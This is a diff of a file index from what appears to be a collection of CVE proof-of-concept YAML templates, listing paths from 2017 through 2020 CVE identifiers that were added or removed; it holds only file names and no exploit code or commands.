./poc/cve/cve-2017-14535-2930.yaml ./poc/cve/cve-2017-14535-2931.yaml @@ -38772,7 +38744,6 @@ ./poc/cve/cve-2017-15647-2952.yaml ./poc/cve/cve-2017-15647-2953.yaml ./poc/cve/cve-2017-15647-2954.yaml -./poc/cve/cve-2017-15647-2955.yaml ./poc/cve/cve-2017-15647-2956.yaml ./poc/cve/cve-2017-15715-2957.yaml ./poc/cve/cve-2017-15715-2958.yaml @@ -38782,6 +38753,7 @@ ./poc/cve/cve-2017-15715-2962.yaml ./poc/cve/cve-2017-15944-2963.yaml ./poc/cve/cve-2017-15944-2964.yaml +./poc/cve/cve-2017-15944-2965.yaml ./poc/cve/cve-2017-16806-2966.yaml ./poc/cve/cve-2017-16806-2967.yaml ./poc/cve/cve-2017-16806-2968.yaml @@ -38798,7 +38770,6 @@ ./poc/cve/cve-2017-17059-2980.yaml ./poc/cve/cve-2017-17451-2981.yaml ./poc/cve/cve-2017-17451-2982.yaml -./poc/cve/cve-2017-17451-2983.yaml ./poc/cve/cve-2017-17562-2984.yaml ./poc/cve/cve-2017-17562-2985.yaml ./poc/cve/cve-2017-17562-2986.yaml @@ -38811,7 +38782,6 @@ ./poc/cve/cve-2017-18024-2992.yaml ./poc/cve/cve-2017-18536-2993.yaml ./poc/cve/cve-2017-18536-2994.yaml -./poc/cve/cve-2017-18536-2995.yaml ./poc/cve/cve-2017-18598-2996.yaml ./poc/cve/cve-2017-18598-2997.yaml ./poc/cve/cve-2017-18638-2998.yaml @@ -38827,7 +38797,6 @@ ./poc/cve/cve-2017-3528-3009.yaml ./poc/cve/cve-2017-3528-3010.yaml ./poc/cve/cve-2017-3528-3011.yaml -./poc/cve/cve-2017-3528-3012.yaml ./poc/cve/cve-2017-3528-3013.yaml ./poc/cve/cve-2017-3881-3014.yaml ./poc/cve/cve-2017-3881-3015.yaml @@ -38840,12 +38809,13 @@ ./poc/cve/cve-2017-5487-3022.yaml ./poc/cve/cve-2017-5487-3023.yaml ./poc/cve/cve-2017-5487-3024.yaml -./poc/cve/cve-2017-5487.yaml ./poc/cve/cve-2017-5521-3025.yaml ./poc/cve/cve-2017-5521-3026.yaml +./poc/cve/cve-2017-5521-3027.yaml ./poc/cve/cve-2017-5521-3028.yaml ./poc/cve/cve-2017-5521-3029.yaml ./poc/cve/cve-2017-5631-3030.yaml +./poc/cve/cve-2017-5631-3031.yaml ./poc/cve/cve-2017-5638-3032.yaml ./poc/cve/cve-2017-5638-3033.yaml ./poc/cve/cve-2017-5638-3034.yaml @@ -38858,7 +38828,6 @@ ./poc/cve/cve-2017-5982-3041.yaml ./poc/cve/cve-2017-5982-3042.yaml ./poc/cve/cve-2017-6090-3043.yaml -./poc/cve/cve-2017-6090-3044.yaml ./poc/cve/cve-2017-6090-3045.yaml ./poc/cve/cve-2017-6090-3046.yaml ./poc/cve/cve-2017-6360-3047.yaml @@ -38876,7 +38845,6 @@ ./poc/cve/cve-2017-7391-3060.yaml ./poc/cve/cve-2017-7391-3061.yaml ./poc/cve/cve-2017-7391-3062.yaml -./poc/cve/cve-2017-7391.yaml ./poc/cve/cve-2017-7529-3063.yaml ./poc/cve/cve-2017-7529-3064.yaml ./poc/cve/cve-2017-7529-3065.yaml @@ -38892,6 +38860,7 @@ ./poc/cve/cve-2017-8917-3075.yaml ./poc/cve/cve-2017-8917-3076.yaml ./poc/cve/cve-2017-8917-3077.yaml +./poc/cve/cve-2017-8917-3078.yaml ./poc/cve/cve-2017-8917-3079.yaml ./poc/cve/cve-2017-9140-3080.yaml ./poc/cve/cve-2017-9140-3081.yaml @@ -38916,7 +38885,9 @@ ./poc/cve/cve-2017-9805-3101.yaml ./poc/cve/cve-2017-9805-3102.yaml ./poc/cve/cve-2017-9805-3103.yaml +./poc/cve/cve-2017-9805-3104.yaml ./poc/cve/cve-2017-9805-3105.yaml +./poc/cve/cve-2017-9822-3106.yaml ./poc/cve/cve-2017-9822-3107.yaml ./poc/cve/cve-2017-9822-3108.yaml ./poc/cve/cve-2017-9822-3109.yaml @@ -38944,12 +38915,12 @@ ./poc/cve/cve-2018-1000129-3131.yaml ./poc/cve/cve-2018-1000129-3132.yaml ./poc/cve/cve-2018-1000129-3133.yaml +./poc/cve/cve-2018-1000129.yaml ./poc/cve/cve-2018-1000130-3134.yaml ./poc/cve/cve-2018-1000130-3135.yaml ./poc/cve/cve-2018-1000130-3136.yaml ./poc/cve/cve-2018-1000130-3137.yaml ./poc/cve/cve-2018-1000226-3138.yaml -./poc/cve/cve-2018-1000226-3139.yaml ./poc/cve/cve-2018-1000226-3140.yaml ./poc/cve/cve-2018-1000533-3142.yaml ./poc/cve/cve-2018-1000533-3143.yaml @@ -38979,7 +38950,6 @@ ./poc/cve/cve-2018-10562-3168.yaml ./poc/cve/cve-2018-10562-3169.yaml ./poc/cve/cve-2018-10562-3170.yaml -./poc/cve/cve-2018-10818-3171.yaml ./poc/cve/cve-2018-10818-3172.yaml ./poc/cve/cve-2018-10818-3173.yaml ./poc/cve/cve-2018-10818-3174.yaml @@ -39004,6 +38974,7 @@ ./poc/cve/cve-2018-11409-3193.yaml ./poc/cve/cve-2018-11409-3194.yaml ./poc/cve/cve-2018-11409-3195.yaml +./poc/cve/cve-2018-11409.yaml ./poc/cve/cve-2018-11709-3196.yaml ./poc/cve/cve-2018-11709-3197.yaml ./poc/cve/cve-2018-11709-3198.yaml @@ -39110,7 +39081,6 @@ ./poc/cve/cve-2018-14013-3298.yaml ./poc/cve/cve-2018-14064-3299.yaml ./poc/cve/cve-2018-14064-3300.yaml -./poc/cve/cve-2018-14064-3301.yaml ./poc/cve/cve-2018-14474-3302.yaml ./poc/cve/cve-2018-14474-3303.yaml ./poc/cve/cve-2018-14574-3304.yaml @@ -39124,8 +39094,6 @@ ./poc/cve/cve-2018-14728-3312.yaml ./poc/cve/cve-2018-14728-3313.yaml ./poc/cve/cve-2018-14728-3314.yaml -./poc/cve/cve-2018-14728.yaml -./poc/cve/cve-2018-14912-3315.yaml ./poc/cve/cve-2018-14912-3316.yaml ./poc/cve/cve-2018-14912-3317.yaml ./poc/cve/cve-2018-14916-3318.yaml @@ -39138,7 +39106,6 @@ ./poc/cve/cve-2018-15138-3327.yaml ./poc/cve/cve-2018-15138-3328.yaml ./poc/cve/cve-2018-15473-3330.yaml -./poc/cve/cve-2018-15517-3331.yaml ./poc/cve/cve-2018-15517-3332.yaml ./poc/cve/cve-2018-15517-3333.yaml ./poc/cve/cve-2018-15517-3334.yaml @@ -39164,12 +39131,13 @@ ./poc/cve/cve-2018-16133-3355.yaml ./poc/cve/cve-2018-16133-3356.yaml ./poc/cve/cve-2018-16133-3357.yaml -./poc/cve/cve-2018-16133-3358.yaml +./poc/cve/cve-2018-16167-3359.yaml ./poc/cve/cve-2018-16167-3360.yaml ./poc/cve/cve-2018-16167-3361.yaml ./poc/cve/cve-2018-16283-3362.yaml ./poc/cve/cve-2018-16283-3363.yaml ./poc/cve/cve-2018-16283-3364.yaml +./poc/cve/cve-2018-16288-3365.yaml ./poc/cve/cve-2018-16288-3366.yaml ./poc/cve/cve-2018-16288-3367.yaml ./poc/cve/cve-2018-16288-3368.yaml @@ -39225,8 +39193,8 @@ ./poc/cve/cve-2018-17254-3418.yaml ./poc/cve/cve-2018-17422-3419.yaml ./poc/cve/cve-2018-17422-3420.yaml -./poc/cve/cve-2018-17422-3421.yaml ./poc/cve/cve-2018-17431-3422.yaml +./poc/cve/cve-2018-17431-3423.yaml ./poc/cve/cve-2018-17431-3424.yaml ./poc/cve/cve-2018-18069-3425.yaml ./poc/cve/cve-2018-18069-3426.yaml @@ -39275,7 +39243,6 @@ ./poc/cve/cve-2018-19386-3471.yaml ./poc/cve/cve-2018-19386-3472.yaml ./poc/cve/cve-2018-19386-3473.yaml -./poc/cve/cve-2018-19386.yaml ./poc/cve/cve-2018-19439-3474.yaml ./poc/cve/cve-2018-19439-3475.yaml ./poc/cve/cve-2018-19439-3476.yaml @@ -39287,14 +39254,12 @@ ./poc/cve/cve-2018-19458-3483.yaml ./poc/cve/cve-2018-19458-3484.yaml ./poc/cve/cve-2018-19458-3485.yaml -./poc/cve/cve-2018-19752(1).yaml ./poc/cve/cve-2018-19753-3486.yaml ./poc/cve/cve-2018-19753-3487.yaml ./poc/cve/cve-2018-19753-3488.yaml -./poc/cve/cve-2018-19877(1).yaml ./poc/cve/cve-2018-19892(1).yaml ./poc/cve/cve-2018-20009(1).yaml -./poc/cve/cve-2018-20010(1).yaml +./poc/cve/cve-2018-20011(1).yaml ./poc/cve/cve-2018-20062-3489.yaml ./poc/cve/cve-2018-20062-3490.yaml ./poc/cve/cve-2018-20062-3491.yaml @@ -39303,7 +39268,6 @@ ./poc/cve/cve-2018-20462-3494.yaml ./poc/cve/cve-2018-20470-3495.yaml ./poc/cve/cve-2018-20470-3496.yaml -./poc/cve/cve-2018-20470-3497.yaml ./poc/cve/cve-2018-20470-3498.yaml ./poc/cve/cve-2018-20824-3499.yaml ./poc/cve/cve-2018-20824-3500.yaml @@ -39313,7 +39277,6 @@ ./poc/cve/cve-2018-20824-3504.yaml ./poc/cve/cve-2018-20985-3505.yaml ./poc/cve/cve-2018-20985-3506.yaml -./poc/cve/cve-2018-20985-3507.yaml ./poc/cve/cve-2018-2392-3508.yaml ./poc/cve/cve-2018-2392-3509.yaml ./poc/cve/cve-2018-2392-3510.yaml @@ -39341,7 +39304,6 @@ ./poc/cve/cve-2018-3167-3534.yaml ./poc/cve/cve-2018-3167-3535.yaml ./poc/cve/cve-2018-3167-3536.yaml -./poc/cve/cve-2018-3167.yaml ./poc/cve/cve-2018-3238-1.yaml ./poc/cve/cve-2018-3238-2.yaml ./poc/cve/cve-2018-3238-3.yaml @@ -39374,25 +39336,24 @@ ./poc/cve/cve-2018-5230-3564.yaml ./poc/cve/cve-2018-5233-3565.yaml ./poc/cve/cve-2018-5233-3566.yaml -./poc/cve/cve-2018-5233-3567.yaml ./poc/cve/cve-2018-5316-3568.yaml ./poc/cve/cve-2018-5316-3569.yaml ./poc/cve/cve-2018-5316-3570.yaml ./poc/cve/cve-2018-6008-3571.yaml ./poc/cve/cve-2018-6008-3572.yaml ./poc/cve/cve-2018-6008-3573.yaml +./poc/cve/cve-2018-6008-3574.yaml ./poc/cve/cve-2018-6008-3575.yaml ./poc/cve/cve-2018-6200-3576.yaml ./poc/cve/cve-2018-6200-3577.yaml -./poc/cve/cve-2018-6200-3578.yaml ./poc/cve/cve-2018-6389-3579.yaml ./poc/cve/cve-2018-6389-3580.yaml ./poc/cve/cve-2018-6389-3581.yaml ./poc/cve/cve-2018-6910-3582.yaml ./poc/cve/cve-2018-6910-3583.yaml ./poc/cve/cve-2018-6910-3584.yaml +./poc/cve/cve-2018-6910-3585.yaml ./poc/cve/cve-2018-6910-3586.yaml -./poc/cve/cve-2018-7251-3587.yaml ./poc/cve/cve-2018-7251-3588.yaml ./poc/cve/cve-2018-7251-3589.yaml ./poc/cve/cve-2018-7251-3590.yaml @@ -39403,6 +39364,7 @@ ./poc/cve/cve-2018-7422-3595.yaml ./poc/cve/cve-2018-7422-3596.yaml ./poc/cve/cve-2018-7467-3597.yaml +./poc/cve/cve-2018-7467-3598.yaml ./poc/cve/cve-2018-7467-3599.yaml ./poc/cve/cve-2018-7467-3600.yaml ./poc/cve/cve-2018-7490-3601.yaml @@ -39422,6 +39384,7 @@ ./poc/cve/cve-2018-7602-3615.yaml ./poc/cve/cve-2018-7662-3616.yaml ./poc/cve/cve-2018-7662-3617.yaml +./poc/cve/cve-2018-7700-3618.yaml ./poc/cve/cve-2018-7700-3619.yaml ./poc/cve/cve-2018-7700-3620.yaml ./poc/cve/cve-2018-7700-3621.yaml @@ -39456,7 +39419,6 @@ ./poc/cve/cve-2018-9118-3651.yaml ./poc/cve/cve-2018-9118-3652.yaml ./poc/cve/cve-2018-9118-3653.yaml -./poc/cve/cve-2018-9118-3654.yaml ./poc/cve/cve-2018-9126-3655.yaml ./poc/cve/cve-2018-9126-3656.yaml ./poc/cve/cve-2018-9126-3657.yaml @@ -39472,6 +39434,7 @@ ./poc/cve/cve-2018-9995-3667.yaml ./poc/cve/cve-2018-9995-3668.yaml ./poc/cve/cve-2018-9995-3669.yaml +./poc/cve/cve-2018–14064(1).yaml ./poc/cve/cve-2019-0193-3670.yaml ./poc/cve/cve-2019-0193-3671.yaml ./poc/cve/cve-2019-0193-3672.yaml @@ -39498,6 +39461,7 @@ ./poc/cve/cve-2019-10092-3693.yaml ./poc/cve/cve-2019-1010287-3694.yaml ./poc/cve/cve-2019-1010287-3695.yaml +./poc/cve/cve-2019-1010287-3696.yaml ./poc/cve/cve-2019-1010287-3697.yaml ./poc/cve/cve-2019-1010287-3698.yaml ./poc/cve/cve-2019-1010290-3699.yaml @@ -39516,10 +39480,12 @@ ./poc/cve/cve-2019-10475-3712.yaml ./poc/cve/cve-2019-10475-3713.yaml ./poc/cve/cve-2019-10475-3714.yaml +./poc/cve/cve-2019-10692(1).yaml ./poc/cve/cve-2019-10758-3715.yaml ./poc/cve/cve-2019-10758-3716.yaml ./poc/cve/cve-2019-10758-3717.yaml ./poc/cve/cve-2019-10758-3718.yaml +./poc/cve/cve-2019-11013-3719.yaml ./poc/cve/cve-2019-11013-3720.yaml ./poc/cve/cve-2019-11013-3721.yaml ./poc/cve/cve-2019-11013-3722.yaml @@ -39531,11 +39497,9 @@ ./poc/cve/cve-2019-11248-3728.yaml ./poc/cve/cve-2019-11248-3729.yaml ./poc/cve/cve-2019-11248-3730.yaml -./poc/cve/cve-2019-11248-3731.yaml ./poc/cve/cve-2019-11248-3732.yaml ./poc/cve/cve-2019-11248-3733.yaml ./poc/cve/cve-2019-11248-3734.yaml -./poc/cve/cve-2019-11370(1).yaml ./poc/cve/cve-2019-11510-3735.yaml ./poc/cve/cve-2019-11510-3736.yaml ./poc/cve/cve-2019-11510-3737.yaml @@ -39609,7 +39573,7 @@ ./poc/cve/cve-2019-12725-3799.yaml ./poc/cve/cve-2019-12725-3800.yaml ./poc/cve/cve-2019-12725-3801.yaml -./poc/cve/cve-2019-13101-3802.yaml +./poc/cve/cve-2019-12962(1).yaml ./poc/cve/cve-2019-13101-3803.yaml ./poc/cve/cve-2019-13101-3804.yaml ./poc/cve/cve-2019-13101-3805.yaml @@ -39645,6 +39609,7 @@ ./poc/cve/cve-2019-14223-3835.yaml ./poc/cve/cve-2019-14223-3836.yaml ./poc/cve/cve-2019-14223.yaml +./poc/cve/cve-2019-14251(1).yaml ./poc/cve/cve-2019-14251-3837.yaml ./poc/cve/cve-2019-14251-3838.yaml ./poc/cve/cve-2019-14312-3839.yaml @@ -39699,6 +39664,7 @@ ./poc/cve/cve-2019-15713-3884.yaml ./poc/cve/cve-2019-15713-3885.yaml ./poc/cve/cve-2019-15713-3886.yaml +./poc/cve/cve-2019-15713-3887.yaml ./poc/cve/cve-2019-15858-3888.yaml ./poc/cve/cve-2019-15858-3889.yaml ./poc/cve/cve-2019-15858-3890.yaml @@ -39725,12 +39691,10 @@ ./poc/cve/cve-2019-16097-3911.yaml ./poc/cve/cve-2019-16097-3912.yaml ./poc/cve/cve-2019-16097-3913.yaml -./poc/cve/cve-2019-16097.yaml ./poc/cve/cve-2019-16123-3914.yaml ./poc/cve/cve-2019-16123-3915.yaml ./poc/cve/cve-2019-16123-3916.yaml ./poc/cve/cve-2019-16123-3917.yaml -./poc/cve/cve-2019-16123-3918.yaml ./poc/cve/cve-2019-16278-3919.yaml ./poc/cve/cve-2019-16278-3920.yaml ./poc/cve/cve-2019-16278-3921.yaml @@ -39738,6 +39702,7 @@ ./poc/cve/cve-2019-16278-3923.yaml ./poc/cve/cve-2019-16278-3924.yaml ./poc/cve/cve-2019-16278-3925.yaml +./poc/cve/cve-2019-16278.yaml ./poc/cve/cve-2019-16313-3926.yaml ./poc/cve/cve-2019-16313-3927.yaml ./poc/cve/cve-2019-16313-3928.yaml @@ -39779,7 +39744,6 @@ ./poc/cve/cve-2019-16920-3960.yaml ./poc/cve/cve-2019-16920-3961.yaml ./poc/cve/cve-2019-16920-3962.yaml -./poc/cve/cve-2019-16931(1).yaml ./poc/cve/cve-2019-16931-3963.yaml ./poc/cve/cve-2019-16932(1).yaml ./poc/cve/cve-2019-16932-3964.yaml @@ -39801,7 +39765,6 @@ ./poc/cve/cve-2019-17382-3979.yaml ./poc/cve/cve-2019-17382-4.yaml ./poc/cve/cve-2019-17418-3980.yaml -./poc/cve/cve-2019-17418-3981.yaml ./poc/cve/cve-2019-17418-3982.yaml ./poc/cve/cve-2019-17444-3983.yaml ./poc/cve/cve-2019-17444-3984.yaml @@ -39824,6 +39787,7 @@ ./poc/cve/cve-2019-17558-4000.yaml ./poc/cve/cve-2019-17558-4001.yaml ./poc/cve/cve-2019-17558-4002.yaml +./poc/cve/cve-2019-17558.yaml ./poc/cve/cve-2019-1821-4003.yaml ./poc/cve/cve-2019-1821-4004.yaml ./poc/cve/cve-2019-18371-4005.yaml @@ -39840,8 +39804,11 @@ ./poc/cve/cve-2019-18394-4016.yaml ./poc/cve/cve-2019-18394-4017.yaml ./poc/cve/cve-2019-18394-4018.yaml +./poc/cve/cve-2019-18394.yaml +./poc/cve/cve-2019-18665(1).yaml ./poc/cve/cve-2019-18665-4019.yaml ./poc/cve/cve-2019-18665-4020.yaml +./poc/cve/cve-2019-18818-4021.yaml ./poc/cve/cve-2019-18818-4022.yaml ./poc/cve/cve-2019-18818-4023.yaml ./poc/cve/cve-2019-18818-4024.yaml @@ -39859,6 +39826,7 @@ ./poc/cve/cve-2019-19368-4036.yaml ./poc/cve/cve-2019-19368-4037.yaml ./poc/cve/cve-2019-19368-4038.yaml +./poc/cve/cve-2019-19368.yaml ./poc/cve/cve-2019-19719-4039.yaml ./poc/cve/cve-2019-19719-4040.yaml ./poc/cve/cve-2019-19719-4041.yaml @@ -39873,7 +39841,6 @@ ./poc/cve/cve-2019-19824-4050.yaml ./poc/cve/cve-2019-19824-4051.yaml ./poc/cve/cve-2019-19824-4052.yaml -./poc/cve/cve-2019-19824-4053.yaml ./poc/cve/cve-2019-19908-4054.yaml ./poc/cve/cve-2019-19908-4055.yaml ./poc/cve/cve-2019-19908-4056.yaml @@ -39909,10 +39876,9 @@ ./poc/cve/cve-2019-20183-4084.yaml ./poc/cve/cve-2019-20183-4085.yaml ./poc/cve/cve-2019-20183-4086.yaml -./poc/cve/cve-2019-20210(1).yaml -./poc/cve/cve-2019-20224(1).yaml ./poc/cve/cve-2019-20224-4087.yaml ./poc/cve/cve-2019-20354(1).yaml +./poc/cve/cve-2019-20933(1).yaml ./poc/cve/cve-2019-2578-1.yaml ./poc/cve/cve-2019-2578-2.yaml ./poc/cve/cve-2019-2578-4088.yaml @@ -39928,7 +39894,6 @@ ./poc/cve/cve-2019-2588-4098.yaml ./poc/cve/cve-2019-2588-4099.yaml ./poc/cve/cve-2019-2588-4100.yaml -./poc/cve/cve-2019-2616(1).yaml ./poc/cve/cve-2019-2616-4101.yaml ./poc/cve/cve-2019-2616-4102.yaml ./poc/cve/cve-2019-2616-4103.yaml @@ -39945,7 +39910,6 @@ ./poc/cve/cve-2019-2729-4114.yaml ./poc/cve/cve-2019-2729-4115.yaml ./poc/cve/cve-2019-2767-4116.yaml -./poc/cve/cve-2019-2767-4117.yaml ./poc/cve/cve-2019-2767-4118.yaml ./poc/cve/cve-2019-2767-4119.yaml ./poc/cve/cve-2019-2767-4120.yaml @@ -40012,6 +39976,7 @@ ./poc/cve/cve-2019-6112-4176.yaml ./poc/cve/cve-2019-6112-4177.yaml ./poc/cve/cve-2019-6112-4178.yaml +./poc/cve/cve-2019-6340(1).yaml ./poc/cve/cve-2019-6340-4179.yaml ./poc/cve/cve-2019-6340-4180.yaml ./poc/cve/cve-2019-6340-4181.yaml @@ -40039,6 +40004,7 @@ ./poc/cve/cve-2019-7238-4204.yaml ./poc/cve/cve-2019-7238-4205.yaml ./poc/cve/cve-2019-7238-4206.yaml +./poc/cve/cve-2019-7238-4207.yaml ./poc/cve/cve-2019-7254-1.yaml ./poc/cve/cve-2019-7254-2.yaml ./poc/cve/cve-2019-7254-4208.yaml @@ -40068,6 +40034,7 @@ ./poc/cve/cve-2019-7543-2.yaml ./poc/cve/cve-2019-7543-4231.yaml ./poc/cve/cve-2019-7543-4232.yaml +./poc/cve/cve-2019-7609-4233.yaml ./poc/cve/cve-2019-7609-4234.yaml ./poc/cve/cve-2019-7609-4235.yaml ./poc/cve/cve-2019-7609-4236.yaml @@ -40087,7 +40054,6 @@ ./poc/cve/cve-2019-8446-4249.yaml ./poc/cve/cve-2019-8446-4250.yaml ./poc/cve/cve-2019-8446-4251.yaml -./poc/cve/cve-2019-8446-4252.yaml ./poc/cve/cve-2019-8449-4253.yaml ./poc/cve/cve-2019-8449-4254.yaml ./poc/cve/cve-2019-8449-4255.yaml @@ -40109,11 +40075,11 @@ ./poc/cve/cve-2019-8903-4271.yaml ./poc/cve/cve-2019-8903-4272.yaml ./poc/cve/cve-2019-8903-4273.yaml -./poc/cve/cve-2019-8903.yaml ./poc/cve/cve-2019-8937-4274.yaml ./poc/cve/cve-2019-8937-4275.yaml ./poc/cve/cve-2019-8937-4276.yaml ./poc/cve/cve-2019-8937-4277.yaml +./poc/cve/cve-2019-8937-4278.yaml ./poc/cve/cve-2019-8982-4279.yaml ./poc/cve/cve-2019-8982-4280.yaml ./poc/cve/cve-2019-8982-4281.yaml @@ -40128,7 +40094,6 @@ ./poc/cve/cve-2019-9041-4289.yaml ./poc/cve/cve-2019-9041-4290.yaml ./poc/cve/cve-2019-9041-4291.yaml -./poc/cve/cve-2019-9082-4292.yaml ./poc/cve/cve-2019-9082-4293.yaml ./poc/cve/cve-2019-9082-4294.yaml ./poc/cve/cve-2019-9618-4295.yaml @@ -40156,6 +40121,7 @@ ./poc/cve/cve-2019-9733-4315.yaml ./poc/cve/cve-2019-9733-4316.yaml ./poc/cve/cve-2019-9733.yaml +./poc/cve/cve-2019-9915(1).yaml ./poc/cve/cve-2019-9915-4317.yaml ./poc/cve/cve-2019-9922-4318.yaml ./poc/cve/cve-2019-9922-4319.yaml @@ -40181,6 +40147,7 @@ ./poc/cve/cve-2020-0618-4338.yaml ./poc/cve/cve-2020-0618-4339.yaml ./poc/cve/cve-2020-0618.yaml +./poc/cve/cve-2020-10124(1).yaml ./poc/cve/cve-2020-10148-4340.yaml ./poc/cve/cve-2020-10148-4341.yaml ./poc/cve/cve-2020-10148-4342.yaml @@ -40198,7 +40165,6 @@ ./poc/cve/cve-2020-10220-4354.yaml ./poc/cve/cve-2020-10220-4355.yaml ./poc/cve/cve-2020-10220-4356.yaml -./poc/cve/cve-2020-10220.yaml ./poc/cve/cve-2020-10546-4357.yaml ./poc/cve/cve-2020-10546-4358.yaml ./poc/cve/cve-2020-10546-4359.yaml @@ -40240,7 +40206,6 @@ ./poc/cve/cve-2020-11110-4394.yaml ./poc/cve/cve-2020-11450-4395.yaml ./poc/cve/cve-2020-11450-4396.yaml -./poc/cve/cve-2020-11455-4397.yaml ./poc/cve/cve-2020-11455-4398.yaml ./poc/cve/cve-2020-11455-4399.yaml ./poc/cve/cve-2020-11455-4400.yaml @@ -40257,6 +40222,7 @@ ./poc/cve/cve-2020-11530-4410.yaml ./poc/cve/cve-2020-11530-4411.yaml ./poc/cve/cve-2020-11530-4412.yaml +./poc/cve/cve-2020-11530.yaml ./poc/cve/cve-2020-11546-4413.yaml ./poc/cve/cve-2020-11546-4414.yaml ./poc/cve/cve-2020-11547-1.yaml @@ -40272,6 +40238,7 @@ ./poc/cve/cve-2020-11710-4422.yaml ./poc/cve/cve-2020-11710-4423.yaml ./poc/cve/cve-2020-11710-4424.yaml +./poc/cve/cve-2020-11738(1).yaml ./poc/cve/cve-2020-11738-1.yaml ./poc/cve/cve-2020-11738-2.yaml ./poc/cve/cve-2020-11738-4425.yaml @@ -40296,6 +40263,7 @@ ./poc/cve/cve-2020-11930-4444.yaml ./poc/cve/cve-2020-11930-4445.yaml ./poc/cve/cve-2020-11930-4446.yaml +./poc/cve/cve-2020-11978(1).yaml ./poc/cve/cve-2020-11978-4447.yaml ./poc/cve/cve-2020-11978-4448.yaml ./poc/cve/cve-2020-11978-4449.yaml @@ -40338,8 +40306,10 @@ ./poc/cve/cve-2020-12800-4486.yaml ./poc/cve/cve-2020-12800-4487.yaml ./poc/cve/cve-2020-12800-4488.yaml +./poc/cve/cve-2020-13117-4489.yaml ./poc/cve/cve-2020-13117-4490.yaml ./poc/cve/cve-2020-13117-4491.yaml +./poc/cve/cve-2020-13121(1).yaml ./poc/cve/cve-2020-13158-4492.yaml ./poc/cve/cve-2020-13158-4493.yaml ./poc/cve/cve-2020-13158-4494.yaml @@ -40387,6 +40357,7 @@ ./poc/cve/cve-2020-13942.yaml ./poc/cve/cve-2020-13945-4533.yaml ./poc/cve/cve-2020-13945-4534.yaml +./poc/cve/cve-2020-13945-4535.yaml ./poc/cve/cve-2020-14092-4536.yaml ./poc/cve/cve-2020-14092-4537.yaml ./poc/cve/cve-2020-14092-4538.yaml @@ -40402,8 +40373,6 @@ ./poc/cve/cve-2020-14181-4549.yaml ./poc/cve/cve-2020-14181-4550.yaml ./poc/cve/cve-2020-14181-4551.yaml -./poc/cve/cve-2020-14181.yaml -./poc/cve/cve-2020-14408(1).yaml ./poc/cve/cve-2020-14413-4552.yaml ./poc/cve/cve-2020-14413-4553.yaml ./poc/cve/cve-2020-14413-4554.yaml @@ -40433,6 +40402,7 @@ ./poc/cve/cve-2020-14882-4577.yaml ./poc/cve/cve-2020-14882-4578.yaml ./poc/cve/cve-2020-14882-4579.yaml +./poc/cve/cve-2020-14882.yaml ./poc/cve/cve-2020-14883-1.yaml ./poc/cve/cve-2020-14883-2.yaml ./poc/cve/cve-2020-14883-4580.yaml @@ -40561,7 +40531,6 @@ ./poc/cve/cve-2020-18268-4703.yaml ./poc/cve/cve-2020-19282-4704.yaml ./poc/cve/cve-2020-19282-4705.yaml -./poc/cve/cve-2020-19282-4706.yaml ./poc/cve/cve-2020-19283-4707.yaml ./poc/cve/cve-2020-19283-4708.yaml ./poc/cve/cve-2020-19283-4709.yaml @@ -40569,6 +40538,7 @@ ./poc/cve/cve-2020-19295-4711.yaml ./poc/cve/cve-2020-19295-4712.yaml ./poc/cve/cve-2020-19360-4713.yaml +./poc/cve/cve-2020-19360-4714.yaml ./poc/cve/cve-2020-1938-4715.yaml ./poc/cve/cve-2020-1938-4716.yaml ./poc/cve/cve-2020-1938-4717.yaml @@ -40587,7 +40557,6 @@ ./poc/cve/cve-2020-19719.yaml ./poc/cve/cve-2020-2036-1.yaml ./poc/cve/cve-2020-2036-2.yaml -./poc/cve/cve-2020-2036-4730.yaml ./poc/cve/cve-2020-2036-4731.yaml ./poc/cve/cve-2020-2036-4732.yaml ./poc/cve/cve-2020-2036-4733.yaml @@ -40597,7 +40566,6 @@ ./poc/cve/cve-2020-2096-4737.yaml ./poc/cve/cve-2020-2096-4738.yaml ./poc/cve/cve-2020-2096-4739.yaml -./poc/cve/cve-2020-20982-4740.yaml ./poc/cve/cve-2020-20982-4741.yaml ./poc/cve/cve-2020-20982-4742.yaml ./poc/cve/cve-2020-20982-4743.yaml @@ -40624,13 +40592,13 @@ ./poc/cve/cve-2020-22209(1).yaml ./poc/cve/cve-2020-22210(1).yaml ./poc/cve/cve-2020-22210-4760.yaml -./poc/cve/cve-2020-22211(1).yaml ./poc/cve/cve-2020-22840-4761.yaml ./poc/cve/cve-2020-22840-4763.yaml ./poc/cve/cve-2020-22840-4764.yaml ./poc/cve/cve-2020-22840-4765.yaml ./poc/cve/cve-2020-22840-4766.yaml ./poc/cve/cve-2020-22840-4767.yaml +./poc/cve/cve-2020-22840.yaml ./poc/cve/cve-2020-23015-4768.yaml ./poc/cve/cve-2020-23015-4769.yaml ./poc/cve/cve-2020-23015-4770.yaml @@ -40669,13 +40637,13 @@ ./poc/cve/cve-2020-24223-4802.yaml ./poc/cve/cve-2020-24223-4803.yaml ./poc/cve/cve-2020-24223-4804.yaml +./poc/cve/cve-2020-24223.yaml ./poc/cve/cve-2020-24312-4805.yaml ./poc/cve/cve-2020-24312-4806.yaml ./poc/cve/cve-2020-24312-4807.yaml ./poc/cve/cve-2020-24312-4808.yaml ./poc/cve/cve-2020-24312-4809.yaml ./poc/cve/cve-2020-24312-4810.yaml -./poc/cve/cve-2020-24391-4811.yaml ./poc/cve/cve-2020-24391-4812.yaml ./poc/cve/cve-2020-24391-4813.yaml ./poc/cve/cve-2020-24550-4814.yaml @@ -40760,7 +40728,6 @@ ./poc/cve/cve-2020-25540-4890.yaml ./poc/cve/cve-2020-25540-4891.yaml ./poc/cve/cve-2020-25540-4892.yaml -./poc/cve/cve-2020-25540.yaml ./poc/cve/cve-2020-2555.yaml ./poc/cve/cve-2020-25780-4893.yaml ./poc/cve/cve-2020-25780-4894.yaml @@ -40812,7 +40779,6 @@ ./poc/cve/cve-2020-27361-4947.yaml ./poc/cve/cve-2020-27467-4948.yaml ./poc/cve/cve-2020-27467-4949.yaml -./poc/cve/cve-2020-27467-4950.yaml ./poc/cve/cve-2020-27467-4951.yaml ./poc/cve/cve-2020-27735-4952.yaml ./poc/cve/cve-2020-27735-4953.yaml @@ -40849,6 +40815,7 @@ ./poc/cve/cve-2020-28871-4986.yaml ./poc/cve/cve-2020-28871-4987.yaml ./poc/cve/cve-2020-28871-4988.yaml +./poc/cve/cve-2020-28976-4989.yaml ./poc/cve/cve-2020-28976-4990.yaml ./poc/cve/cve-2020-28976-4991.yaml ./poc/cve/cve-2020-29164-4992.yaml @@ -40859,12 +40826,14 @@ ./poc/cve/cve-2020-29164-4997.yaml ./poc/cve/cve-2020-29227-4998.yaml 